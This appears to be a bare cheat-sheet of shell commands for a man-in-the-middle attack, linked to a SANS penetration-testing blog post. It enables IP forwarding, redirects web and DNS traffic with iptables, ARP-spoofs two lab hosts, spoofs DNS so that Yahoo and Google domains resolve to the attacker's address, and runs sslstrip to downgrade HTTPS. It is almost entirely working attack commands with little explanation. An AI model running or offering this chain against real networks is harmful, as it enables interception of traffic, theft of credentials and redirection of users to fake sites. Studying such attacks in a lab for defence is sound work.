https://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
echo "1" > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward   ( like : fragrouter -B1 ) -B1: base-1: normal IP forwarding

iptables --flush

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j REDIRECT --to-port 53

iptables -t nat -L -n -v | grep 'something'

arpspoof -i eth0 -t 10.20.20.132 10.20.20.2 

arpspoof -i eth0 -t 10.20.20.2 10.20.20.132

python dns2proxy.py  ( dnschef -h ) like -> dnsspoof -i eth0 -f /root/Desktop/hosts.txt ( host file listfake dns record below)

                                                                                            10.20.20.130   *.yahoo.com
                                                                                            10.20.20.130   *.google.*
sslstrip -l 9000 -a

